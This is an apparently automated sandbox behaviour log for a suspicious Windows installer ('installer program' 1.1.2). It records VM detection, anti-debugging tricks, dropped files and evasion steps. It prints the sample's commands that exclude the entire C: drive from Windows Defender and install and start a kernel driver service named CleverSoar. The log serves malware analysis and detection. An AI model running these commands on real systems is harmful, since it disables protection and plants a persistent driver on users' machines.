Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6804Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2805Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpWindow / User API: threadDelayed 645Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpWindow / User API: threadDelayed 648Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpWindow / User API: threadDelayed 594Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-08K47.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB5E090 FindFirstFileA,FindClose,FindClose,6_2_6CB5E090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00566868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00566868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00567496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00567496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00569C60 GetSystemInfo,9_2_00569C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000002.2136132669.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\:
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp, 00000002.00000002.2136132669.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6C9E3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C9E3886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB73871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CB73871
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_005E57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_005E57D0
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB7D425 mov eax, dword ptr fs:[00000030h]6_2_6CB7D425
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB7D456 mov eax, dword ptr fs:[00000030h]6_2_6CB7D456
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB7286D mov eax, dword ptr fs:[00000030h]6_2_6CB7286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB73871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CB73871
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CB6C3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CB6C3AD

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmpCode function: 6_2_6CC3A700 cpuid 6_2_6CC3A700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
